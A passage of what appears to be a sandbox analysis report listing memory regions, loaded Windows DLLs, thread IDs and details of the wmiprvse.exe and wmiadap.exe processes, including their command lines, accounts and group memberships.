start_va = 0x7ffc57750000 end_va = 0x7ffc57890fff entry_point = 0x7ffc57750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6287 start_va = 0x7ffc578a0000 end_va = 0x7ffc578f0fff entry_point = 0x7ffc578a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6288 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6289 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6290 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6291 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6675 start_va = 0xb432300000 end_va = 0xb4323fffff entry_point = 0x0 region_type = private name = "private_0x000000b432300000" filename = "" Region: id = 6676 start_va = 0xb432500000 end_va = 0xb4325fffff entry_point = 0x0 region_type = private name = "private_0x000000b432500000" filename = "" Region: id = 6677 start_va = 0x7ffc51a40000 end_va = 0x7ffc51a48fff entry_point = 0x7ffc51a40000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 7098 start_va = 0xb430040000 end_va = 0xb43013ffff entry_point = 0x0 region_type = private name = "private_0x000000b430040000" filename = "" Region: id = 7099 start_va = 0xb430340000 end_va = 0xb4303bffff entry_point = 0x0 region_type = private name = "private_0x000000b430340000" filename = "" Region: id = 7100 start_va = 0x7ff6e015e000 end_va = 0x7ff6e015ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e015e000" filename = "" Region: id = 7101 start_va = 0x7ff6e028b000 end_va = 0x7ff6e028cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e028b000" filename = "" Region: id = 7102 start_va = 0x7ffc3f690000 end_va = 0x7ffc3f7b1fff entry_point = 0x7ffc3f690000 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 7103 start_va = 0x7ffc4b890000 end_va = 0x7ffc4b899fff entry_point = 0x7ffc4b890000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 7104 start_va = 0x7ffc50360000 end_va = 0x7ffc503acfff entry_point = 0x7ffc50360000 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 7105 start_va = 0x7ffc51460000 end_va = 0x7ffc5146afff entry_point = 0x7ffc51460000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Thread: id = 23 os_tid = 0xc5c Thread: id = 24 os_tid = 0xc68 Thread: id = 25 os_tid = 0xc38 Thread: id = 26 os_tid = 0xfa0 Thread: id = 27 os_tid = 0xec8 Thread: id = 28 os_tid = 0xe78 Thread: id = 29 os_tid = 0xd88 Thread: id = 30 os_tid = 0xd84 Thread: id = 31 os_tid = 0xd80 Thread: id = 32 os_tid = 0xd7c Thread: id = 33 os_tid = 0xd68 Thread: id = 34 os_tid = 0xc54 Thread: id = 35 os_tid = 0xc24 Thread: id = 36 os_tid = 0x534 Thread: id = 37 os_tid = 0x7fc Thread: id = 38 os_tid = 0x8a4 Thread: id = 39 os_tid = 0x6d8 Thread: id = 40 os_tid = 0x24c Thread: id = 41 os_tid = 0x8b4 Thread: id = 42 os_tid = 0x8b0 Thread: id = 43 os_tid = 0x894 Thread: id = 44 os_tid = 0x864 Thread: id = 45 os_tid = 0x43c Thread: id = 46 os_tid = 0x7a8 Thread: id = 47 os_tid = 0x778 Thread: id = 48 os_tid = 0x758 Thread: id = 49 os_tid = 0x750 Thread: id = 50 os_tid = 0x73c Thread: id = 51 os_tid = 0x734 Thread: id = 52 os_tid = 0x730 Thread: id = 53 os_tid = 0x72c Thread: id = 54 os_tid = 0x700 Thread: id = 55 os_tid = 0x6fc Thread: id = 56 os_tid = 0x64c Thread: id = 57 os_tid = 0x634 Thread: id = 58 os_tid = 0x624 Thread: id = 59 os_tid = 0x604 Thread: id = 60 os_tid = 0x600 Thread: id = 61 os_tid = 0x5f8 Thread: id = 62 os_tid = 0x5f0 Thread: id = 63 os_tid = 0x5ec Thread: id = 64 os_tid = 0x5e8 Thread: id = 65 os_tid = 0x5e0 Thread: id = 66 os_tid = 0x5c8 Thread: id = 67 os_tid = 0x5b4 Thread: id = 68 os_tid = 0x5b0 Thread: id = 69 os_tid = 0x590 Thread: id = 70 os_tid = 0x574 Thread: id = 71 os_tid = 0x50c Thread: id = 72 os_tid = 0x40c Thread: id = 73 os_tid = 0x374 Thread: id = 74 os_tid = 0x140 Thread: id = 75 os_tid = 0x18c Thread: id = 76 os_tid = 0x14c Thread: id = 77 os_tid = 0xfc Thread: id = 78 os_tid = 0xf8 Thread: id = 79 os_tid = 0xf4 Thread: id = 80 os_tid = 0x3fc Thread: id = 81 os_tid = 0x3ec Thread: id = 82 os_tid = 0x3e8 Thread: id = 83 os_tid = 0x3e0 Thread: id = 84 os_tid = 0x3d0 Thread: id = 85 os_tid = 0x3cc Thread: id = 86 os_tid = 0x3c8 Thread: id = 87 os_tid = 0x3b8 Thread: id = 88 os_tid = 0x390 Thread: id = 89 os_tid = 0x328 Thread: id = 91 os_tid = 0x148 Thread: id = 92 os_tid = 0x98c Thread: id = 108 os_tid = 0xdc4 Thread: id = 109 os_tid = 0xd9c Thread: id = 110 os_tid = 0xda8 Thread: id = 120 os_tid = 0xce8 Thread: id = 178 os_tid = 0x274 Thread: id = 179 os_tid = 0x304 Thread: id = 180 os_tid = 0xba4 Thread: id = 181 os_tid = 0x9b4 Thread: id = 182 os_tid = 0xfc8 Thread: id = 183 os_tid = 0xfc0 Thread: id = 184 os_tid = 0x8e0 Thread: id = 185 os_tid = 0xb60 Thread: id = 186 os_tid = 0x56c Thread: id = 187 os_tid = 0xfb8 Thread: id = 189 os_tid = 0x5e4 Thread: id = 190 os_tid = 0x75c Process: id = "5" image_name = "wmiprvse.exe" filename = "c:\\windows\\syswow64\\wbem\\wmiprvse.exe" page_root = "0x49271000" os_pid = "0xb20" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x324" cmd_line = "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000834fc" [0xc000000f] Region: id = 6306 start_va = 0x980000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 6307 start_va = 0x9a0000 end_va = 0x9a0fff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 6308 start_va = 0x9b0000 end_va = 0x9c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 6309 start_va = 0x9d0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 6310 start_va = 0xa10000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 6311 start_va = 0xa50000 end_va = 0xa53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 6312 start_va = 0xa60000 end_va = 0xa60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 6313 start_va = 0xa70000 end_va = 0xa71fff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 6314 start_va = 0xc30000 end_va = 0xc98fff entry_point = 0xc30000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmiprvse.exe") Region: id = 6315 start_va = 0xca0000 end_va = 0x4c9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 6316 start_va = 0x776b0000 end_va = 0x77828fff entry_point = 0x776b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6317 start_va = 0x7e130000 end_va = 0x7e152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e130000" filename = "" Region: id = 6318 start_va = 0x7e157000 end_va = 0x7e157fff entry_point = 0x0 region_type = private name = "private_0x000000007e157000" filename = "" Region: id = 6319 start_va = 0x7e15a000 end_va = 0x7e15cfff entry_point = 0x0 region_type = private name = "private_0x000000007e15a000" filename = "" Region: id = 6320 start_va = 0x7e15d000 end_va = 0x7e15dfff entry_point = 0x0 region_type = private name = "private_0x000000007e15d000" filename = "" Region: id = 6321 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6322 start_va = 0x7fff0000 end_va = 0x7dfc57b4ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6323 start_va = 0x7dfc57b50000 end_va = 0x7ffc57b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc57b50000" filename = "" Region: id = 6324 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6325 start_va = 0x7ffc57d12000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc57d12000" filename = "" Region: id = 6326 start_va = 0xab0000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 6327 start_va = 0x5bab0000 end_va = 0x5bb22fff entry_point = 0x5bab0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6328 start_va = 0x5bb30000 end_va = 0x5bb7efff entry_point = 0x5bb30000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6329 start_va = 0x5baa0000 end_va = 0x5baa7fff entry_point = 0x5baa0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6330 start_va = 0x4df0000 end_va = 0x4eeffff entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 6331 start_va = 0x74f40000 end_va = 0x7502ffff entry_point = 0x74f40000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6332 start_va = 0x75190000 end_va = 0x75305fff entry_point = 0x75190000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6333 start_va = 0x980000 end_va = 0x98ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 6334 start_va = 0x990000 end_va = 0x99dfff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 6335 start_va = 0xac0000 end_va = 0xb7dfff entry_point = 0xac0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6336 start_va = 0xb80000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 6337 start_va = 0xbc0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 6338 start_va = 0x4d30000 end_va = 0x4d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d30000" filename = "" Region: id = 6339 start_va = 0x73310000 end_va = 0x73321fff entry_point = 0x73310000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\SysWOW64\\ncobjapi.dll" (normalized: "c:\\windows\\syswow64\\ncobjapi.dll") Region: id = 6340 start_va = 0x73380000 end_va = 0x7343bfff entry_point = 0x73380000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 6341 start_va = 0x74010000 end_va = 0x74075fff entry_point = 0x74010000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 6342 start_va = 0x743a0000 end_va = 0x743bafff entry_point = 0x743a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 6343 start_va = 0x74750000 end_va = 0x747a8fff entry_point = 0x74750000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6344 start_va = 0x747b0000 end_va = 0x747b9fff entry_point = 0x747b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6345 start_va = 0x747c0000 end_va = 0x747ddfff entry_point = 0x747c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6346 start_va = 0x74a00000 end_va = 0x74aabfff entry_point = 0x74a00000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6347 start_va = 0x74d30000 end_va = 0x74d8bfff entry_point = 0x74d30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 6348 start_va = 0x76f20000 end_va = 0x76fddfff entry_point = 0x76f20000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6349 start_va = 0x770c0000 end_va = 0x770c6fff entry_point = 0x770c0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 6350 start_va = 0x772b0000 end_va = 0x772f2fff entry_point = 0x772b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6351 start_va = 0x77390000 end_va = 0x77549fff entry_point = 0x77390000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6352 start_va = 0x7e030000 end_va = 0x7e12ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e030000" filename = "" Region: id = 6353 start_va = 0x7e154000 end_va = 0x7e156fff entry_point = 0x0 region_type = private name = "private_0x000000007e154000" filename = "" Region: id = 6354 start_va = 0x77550000 end_va = 0x775cafff entry_point = 0x77550000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6355 start_va = 0x4ef0000 end_va = 0x5226fff entry_point = 0x4ef0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6356 start_va = 0x75030000 end_va = 0x7517cfff entry_point = 0x75030000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6357 start_va = 0x76c70000 end_va = 0x76daffff entry_point = 0x76c70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6358 start_va = 0x9a0000 end_va = 0x9a0fff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 6359 start_va = 0xa80000 end_va = 0xa80fff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 6360 start_va = 0xa90000 end_va = 0xa94fff entry_point = 0xa90000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 6361 start_va = 0xaa0000 end_va = 0xaa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 6362 start_va = 0xc00000 end_va = 0xc0dfff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 6363 start_va = 0xc10000 end_va = 0xc10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c10000" filename = "" Region: id = 6364 start_va = 0xc20000 end_va = 0xc20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 6365 start_va = 0x4ca0000 end_va = 0x4cdffff entry_point = 0x0 region_type = private name = "private_0x0000000004ca0000" filename = "" Region: id = 6366 start_va = 0x4ce0000 end_va = 0x4d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ce0000" filename = "" Region: id = 6367 start_va = 0x4d40000 end_va = 0x4d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 6368 start_va = 0x4d80000 end_va = 0x4dbffff entry_point = 0x0 region_type = private name = "private_0x0000000004d80000" filename = "" Region: id = 6369 start_va = 0x5230000 end_va = 0x53b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005230000" filename = "" Region: id = 6370 start_va = 0x53c0000 end_va = 0x5540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000053c0000" filename = "" Region: id = 6371 start_va = 0x5550000 end_va = 0x560ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005550000" filename = "" Region: id = 6372 start_va = 0x5610000 end_va = 0x570ffff entry_point = 0x0 region_type = private name = "private_0x0000000005610000" filename = "" Region: id = 6373 start_va = 0x5710000 end_va = 0x574ffff entry_point = 0x0 region_type = private name = "private_0x0000000005710000" filename = "" Region: id = 6374 start_va = 0x5750000 end_va = 0x578ffff entry_point = 0x0 region_type = private name = "private_0x0000000005750000" filename = "" Region: id = 6375 start_va = 0x5790000 end_va = 0x57cffff entry_point = 0x0 region_type = private name = "private_0x0000000005790000" filename = "" Region: id = 6376 start_va = 0x57d0000 end_va = 0x580ffff entry_point = 0x0 region_type = private name = "private_0x00000000057d0000" filename = "" Region: id = 6377 start_va = 0x5810000 end_va = 0x584ffff entry_point = 0x0 region_type = private name = "private_0x0000000005810000" filename = "" Region: id = 6378 start_va = 0x5850000 end_va = 0x588ffff entry_point = 0x0 region_type = private name = "private_0x0000000005850000" filename = "" Region: id = 6379 start_va = 0x5890000 end_va = 0x58cffff entry_point = 0x0 region_type = private name = "private_0x0000000005890000" filename = "" Region: id = 6380 start_va = 0x58d0000 end_va = 0x590ffff entry_point = 0x0 region_type = private name = "private_0x00000000058d0000" filename = "" Region: id = 6381 start_va = 0x5910000 end_va = 0x594ffff entry_point = 0x0 region_type = private name = "private_0x0000000005910000" filename = "" Region: id = 6382 start_va = 0x5950000 end_va = 0x598ffff entry_point = 0x0 region_type = private name = "private_0x0000000005950000" filename = "" Region: id = 6383 start_va = 0x732f0000 end_va = 0x7330dfff entry_point = 0x732f0000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 6384 start_va = 0x73500000 end_va = 0x73510fff entry_point = 0x73500000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 6385 start_va = 0x74080000 end_va = 0x7408cfff entry_point = 0x74080000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 6386 start_va = 0x74370000 end_va = 0x7439efff entry_point = 0x74370000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 6387 start_va = 0x743c0000 end_va = 0x743d2fff entry_point = 0x743c0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 6388 start_va = 0x74ab0000 end_va = 0x74abbfff entry_point = 0x74ab0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6389 start_va = 0x76fe0000 end_va = 0x77061fff entry_point = 0x76fe0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 6390 start_va = 0x770d0000 end_va = 0x77161fff entry_point = 0x770d0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 6391 start_va = 0x7e01b000 end_va = 0x7e01dfff entry_point = 0x0 region_type = private name = "private_0x000000007e01b000" filename = "" Region: id = 6392 start_va = 0x7e01e000 end_va = 0x7e020fff entry_point = 0x0 region_type = private name = "private_0x000000007e01e000" filename = "" Region: id = 6393 start_va = 0x7e021000 end_va = 0x7e023fff entry_point = 0x0 region_type = private name = "private_0x000000007e021000" filename = "" Region: id = 6394 start_va = 0x7e024000 end_va = 0x7e026fff entry_point = 0x0 region_type = private name = "private_0x000000007e024000" filename = "" Region: id = 6395 start_va = 0x7e027000 end_va = 0x7e029fff entry_point = 0x0 region_type = private name = "private_0x000000007e027000" filename = "" Region: id = 6396 start_va = 0x7e02a000 end_va = 0x7e02cfff entry_point = 0x0 region_type = private name = "private_0x000000007e02a000" filename = "" Region: id = 6397 start_va = 0x7e02d000 end_va = 0x7e02ffff entry_point = 0x0 region_type = private name = "private_0x000000007e02d000" filename = "" Region: id = 6398 start_va = 0x73180000 end_va = 0x73190fff entry_point = 0x73180000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll") Region: id = 6399 start_va = 0x731a0000 end_va = 0x732bafff entry_point = 0x731a0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll") Region: id = 6400 start_va = 0x732c0000 end_va = 0x732e0fff entry_point = 0x732c0000 region_type = mapped_file name = "vsswmi.dll" filename = "\\Windows\\SysWOW64\\wbem\\vsswmi.dll" (normalized: "c:\\windows\\syswow64\\wbem\\vsswmi.dll") Region: id = 6401 start_va = 0x74090000 end_va = 0x740cefff entry_point = 0x74090000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Thread: id = 93 os_tid = 0x2e4 Thread: id = 94 os_tid = 0x4f8 Thread: id = 95 os_tid = 0xcf0 Thread: id = 96 os_tid = 0x65c Thread: id = 97 os_tid = 0x61c Thread: id = 98 os_tid = 0x2cc Thread: id = 99 os_tid = 0xc44 Thread: id = 100 os_tid = 0x954 Thread: id = 101 os_tid = 0x788 Process: id = "6" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x372b7000" os_pid = "0xda4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x324" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b5ca" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 6404 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6405 start_va = 0xf1106e0000 end_va = 0xf1106fffff entry_point = 0x0 region_type = private name = "private_0x000000f1106e0000" filename = "" Region: id = 6406 start_va = 0xf110700000 end_va = 0xf110713fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f110700000" filename = "" Region: id = 6407 start_va = 0xf110720000 end_va = 0xf11079ffff entry_point = 0x0 region_type = private name = "private_0x000000f110720000" filename = "" Region: id = 6408 start_va = 0xf1107a0000 end_va = 0xf1107a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f1107a0000" filename = "" Region: id = 6409 start_va = 0xf1107b0000 end_va = 0xf1107b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f1107b0000" filename = "" Region: id = 6410 start_va = 0xf1107c0000 end_va = 0xf1107c1fff entry_point = 0x0 region_type = private name = "private_0x000000f1107c0000" filename = "" Region: id = 6411 start_va = 0x7df5ffe40000 end_va = 0x7ff5ffe3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe40000" filename = "" Region: id = 6412 start_va = 0x7ff6a8ff0000 end_va = 0x7ff6a9012fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6a8ff0000" filename = "" Region: id = 6413 start_va = 0x7ff6a901d000 end_va = 0x7ff6a901dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6a901d000" filename = "" Region: id = 6414 start_va = 0x7ff6a901e000 end_va = 0x7ff6a901ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6a901e000" filename = "" Region: id = 6415 start_va = 0x7ff6a9820000 end_va = 0x7ff6a984efff entry_point = 0x7ff6a9820000 region_type = mapped_file name = "wmiadap.exe" filename = "\\Windows\\System32\\wbem\\WMIADAP.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiadap.exe") Region: id = 6416 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 